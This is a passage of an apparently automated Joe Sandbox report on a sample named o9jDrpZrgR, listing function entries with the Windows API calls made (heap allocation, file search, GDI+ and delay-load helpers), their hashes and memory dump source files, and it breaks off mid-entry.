                                                              • API ID: AddressProc
                                                              • String ID:
                                                              • API String ID: 190572456-0
                                                              • Opcode ID: 54e2bf5801ff78b56c50927d892ffb9deab014feb2e1292c5dca54aa9a9a276e
                                                              • Instruction ID: d3dc49baef5e2500c1cd8ad1b54b6b5d947f8d4d780a2854b929c650b929547d
                                                              • Opcode Fuzzy Hash: 54e2bf5801ff78b56c50927d892ffb9deab014feb2e1292c5dca54aa9a9a276e
                                                              • Instruction Fuzzy Hash: AAF0E5322002169FEF119EACFC04A9A77A9FF12B307104125FA05E75D0DB31EA20C790
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008ACA2C,00000000,?,008A6CBE,?,00000008,?,008A91E0,?,?,?), ref: 008A8E38
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 4580757fef041af7d1e38a9aa1ef868e620baddfdfc975e75f525d677990a680
                                                              • Instruction ID: c5275b10cb48f81d49b0b04d3e91ce1cffe79c1cab5d78621dce2a004ee0c468
                                                              • Opcode Fuzzy Hash: 4580757fef041af7d1e38a9aa1ef868e620baddfdfc975e75f525d677990a680
                                                              • Instruction Fuzzy Hash: 46E0E531206125D6FB7127259C04B5F7688FB433B4F110110AC59D6C91DF21CC2086F1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00885AC2
                                                                • Part of subcall function 0088B505: __EH_prolog.LIBCMT ref: 0088B50A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: f4bc071d32b6458643b8a5060aef8c474ae8246213d13f236f606c5a653f6034
                                                              • Instruction ID: 095d01bd50c3009e3236e421d18f0d47c32afdc248125fef3eef89a0e0c65cf4
                                                              • Opcode Fuzzy Hash: f4bc071d32b6458643b8a5060aef8c474ae8246213d13f236f606c5a653f6034
                                                              • Instruction Fuzzy Hash: 31016930810790DEDB26F7ACC0417DDBBA4EF64304F58848DA456A3282DBB42B08DBA3
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,008895D6,?,?,?,?,?,008B2641,000000FF), ref: 0088963B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: ChangeCloseFindNotification
                                                              • String ID:
                                                              • API String ID: 2591292051-0
                                                              • Opcode ID: 5bf64e4a65e8c885c35693ca190e259f37901f3e592996a943eba8ebe6649fdc
                                                              • Instruction ID: 0f982b7a99942414d6557b1b12b0de133cc8c15ac7992f6388979eb4ac89b6fd
                                                              • Opcode Fuzzy Hash: 5bf64e4a65e8c885c35693ca190e259f37901f3e592996a943eba8ebe6649fdc
                                                              • Instruction Fuzzy Hash: 75F05470485B159EDB31EA64C458BA277E8FB22325F081B1ED0E7829E0E771658D8B40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 0088A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0088A592,000000FF,?,?), ref: 0088A6C4
                                                                • Part of subcall function 0088A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0088A592,000000FF,?,?), ref: 0088A6F2
                                                                • Part of subcall function 0088A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0088A592,000000FF,?,?), ref: 0088A6FE
                                                              • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0088A598
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: Find$FileFirst$CloseErrorLast
                                                              • String ID:
                                                              • API String ID: 1464966427-0
                                                              • Opcode ID: b2aa1137eeb2db01b04d1eea683a761dd921a7daf718b128b68937a5ab4b7959
                                                              • Instruction ID: c0df90654e161640dcf0b88db874755ed3abb0bc22161fbf2d66bc40f39aa8ce
                                                              • Opcode Fuzzy Hash: b2aa1137eeb2db01b04d1eea683a761dd921a7daf718b128b68937a5ab4b7959
                                                              • Instruction Fuzzy Hash: BAF05E31008790AADA6677B88904BDA7B90BF1A321F048A4AF1F9921D6C37551959B23
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SetThreadExecutionState.KERNEL32(00000001), ref: 00890E3D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: ExecutionStateThread
                                                              • String ID:
                                                              • API String ID: 2211380416-0
                                                              • Opcode ID: 7062559ef5d21689680f0731b3cb9cf5c134d26e3cd2215f2a49ab89ff7da1e9
                                                              • Instruction ID: c26d2e23fb26321e0ac88dcc8bf9f7b54f77ba514b2f493ca5b7fdb2a05f5510
                                                              • Opcode Fuzzy Hash: 7062559ef5d21689680f0731b3cb9cf5c134d26e3cd2215f2a49ab89ff7da1e9
                                                              • Instruction Fuzzy Hash: DED012116150565ADE11332C695DBFE2617FFC7321F0D0065B145D7183DE644886A263
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GdipAlloc.GDIPLUS(00000010), ref: 0089A62C
                                                                • Part of subcall function 0089A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0089A3DA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: Gdip$AllocBitmapCreateFromStream
                                                              • String ID:
                                                              • API String ID: 1915507550-0
                                                              • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                              • Instruction ID: 74cf48fc3cbe844a9f2f86d826d9f80cc145e806ea89f0b593ae91c7ac582a88
                                                              • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                              • Instruction Fuzzy Hash: BCD0A93020020CBADF0ABB26CC0297E7ADAFB10740F088021B842E5281EBB1D910A2A3
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • DloadProtectSection.DELAYIMP ref: 0089E5E3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: DloadProtectSection
                                                              • String ID:
                                                              • API String ID: 2203082970-0
                                                              • Opcode ID: 229f8ba0e5c227c79150a778433354647b812a82303060af56d20707320231fc
                                                              • Instruction ID: 516fcd9414ad5856d14093f1fb9a5556c80b681b03ac4485082eba6ee009793f
                                                              • Opcode Fuzzy Hash: 229f8ba0e5c227c79150a778433354647b812a82303060af56d20707320231fc
                                                              • Instruction Fuzzy Hash: 2DD0C9B0580280ABDE02FBA8A88A7243B54F325B04FA80115F145D5595DA745480C606
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00891B3E), ref: 0089DD92
                                                                • Part of subcall function 0089B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0089B579
                                                                • Part of subcall function 0089B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0089B58A
                                                                • Part of subcall function 0089B568: IsDialogMessageW.USER32(0001042C,?), ref: 0089B59E
                                                                • Part of subcall function 0089B568: TranslateMessage.USER32(?), ref: 0089B5AC
                                                                • Part of subcall function 0089B568: DispatchMessageW.USER32(?), ref: 0089B5B6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                              • String ID:
                                                              • API String ID: 897784432-0
                                                              • Opcode ID: 1b70116bf4feb822781ee60fa6a6903b0c3d448550e9af0b4e84de7043c7820b
                                                              • Instruction ID: 8d92ffec57a704d754361def787ecdea6b5f4dd3c7e41d69f3afdc39585ea5a0
                                                              • Opcode Fuzzy Hash: 1b70116bf4feb822781ee60fa6a6903b0c3d448550e9af0b4e84de7043c7820b
                                                              • Instruction Fuzzy Hash: C8D09E31144300BADA023B55DE06F1A7AA2FB88B09F004555B284750B186729E21DF16
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetFileType.KERNELBASE(000000FF,008897BE), ref: 008898C8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: FileType
                                                              • String ID:
                                                              • API String ID: 3081899298-0
                                                              • Opcode ID: c52baa38ebc448b495506d90b5055b3befc0911f6a64f4b7a33a58dcb5b93030
                                                              • Instruction ID: 613c5892cba69103428a40fb54a1b02e92132dde6d1fd51a7ab60b92a13b6774
                                                              • Opcode Fuzzy Hash: c52baa38ebc448b495506d90b5055b3befc0911f6a64f4b7a33a58dcb5b93030
                                                              • Instruction Fuzzy Hash: 28C00234404506958E61662598450A57711FF533697B897A4D0A9C54A1C322CC57EB11
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0089E1E3
                                                                • Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
                                                                • Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: b4aa264b45442a09e63a82c3efce034e23040230971d0489e7b967842bb9a871
                                                              • Instruction ID: 0328fec931a53dd369c32157e3ef6250ac7b1e3e31dfff353aa64adfbdab3470
                                                              • Opcode Fuzzy Hash: b4aa264b45442a09e63a82c3efce034e23040230971d0489e7b967842bb9a871
                                                              • Instruction Fuzzy Hash: D7B012D5268145BC3504B1CA1C07C37150CF0C2B11334843EFC71D4980DC40AD840432
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0089E1E3
                                                                • Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
                                                                • Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: fefb01313ed6039e0c6953c7d92f370bf50b73ce99506fa2bb1993705ef08866
                                                              • Instruction ID: a8cc8105fdde27deae9b84eca1ef4e3df16841f1c0a8068377832e4473f5ce45
                                                              • Opcode Fuzzy Hash: fefb01313ed6039e0c6953c7d92f370bf50b73ce99506fa2bb1993705ef08866
                                                              • Instruction Fuzzy Hash: C8B012D526C149EC3504F1CE1C07D37150CF0C1B11334407EF875C5680DC406D840532
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0089E1E3
                                                                • Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
                                                                • Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 33550b7c920709861202d0efbc37c10eb9e07c50ba9159831260b38142afe415
                                                              • Instruction ID: 48290da5255fcacd3a7ddc82d17f2e3f39cdad28e67cc25f15bc9f5386439d34
                                                              • Opcode Fuzzy Hash: 33550b7c920709861202d0efbc37c10eb9e07c50ba9159831260b38142afe415
                                                              • Instruction Fuzzy Hash: F5B012D1268045BD3504F68A1C07D37150CF0C2B11334C03EFC65C57C0DC40AC880432
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0089E1E3
                                                                • Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
                                                                • Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 2b0b12d9aca1e187b396c5a5c3897aaa240b745ccffbf3115f693271eb3e4569
                                                              • Instruction ID: 93821dcad7ac03841dcf67af66a187c3460cb28d9071c44534093680672f57ff
                                                              • Opcode Fuzzy Hash: 2b0b12d9aca1e187b396c5a5c3897aaa240b745ccffbf3115f693271eb3e4569
                                                              • Instruction Fuzzy Hash: D1B012E1268045EC3504F18A1D07D37158CF0C1B11334403EF865D5680EC406D851432
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0089E1E3
                                                                • Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
                                                                • Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 46e001195a045bcff50eac6f7e0dc707e88a64e97ba9a9620ef8eadc37268f0e
                                                              • Instruction ID: dd06eee29ced71d4d32e186a4be1933ad43f5672e016b639afb9cc5b0332c3a5
                                                              • Opcode Fuzzy Hash: 46e001195a045bcff50eac6f7e0dc707e88a64e97ba9a9620ef8eadc37268f0e
                                                              • Instruction Fuzzy Hash: FBB012D1268045BD3504F28A1D07D37150CF0C1B11334803EF865C5780DC506D8D0432
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0089E1E3
                                                                • Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
                                                                • Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: a760bfe127940c275684a93e0c72378763e06b45c00342c2e8894db750f5c4a2
                                                              • Instruction ID: 8e9eae2f19de494d742a6ca4a681d0a23bb54cb26cd40650441bdf1882c1e8fe
                                                              • Opcode Fuzzy Hash: a760bfe127940c275684a93e0c72378763e06b45c00342c2e8894db750f5c4a2
                                                              • Instruction Fuzzy Hash: DBB012D1368185BD3544F28A2C07D37150CF0C1B11334813EF865C5780DC406CC80432
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0089E1E3
                                                                • Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
                                                                • Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
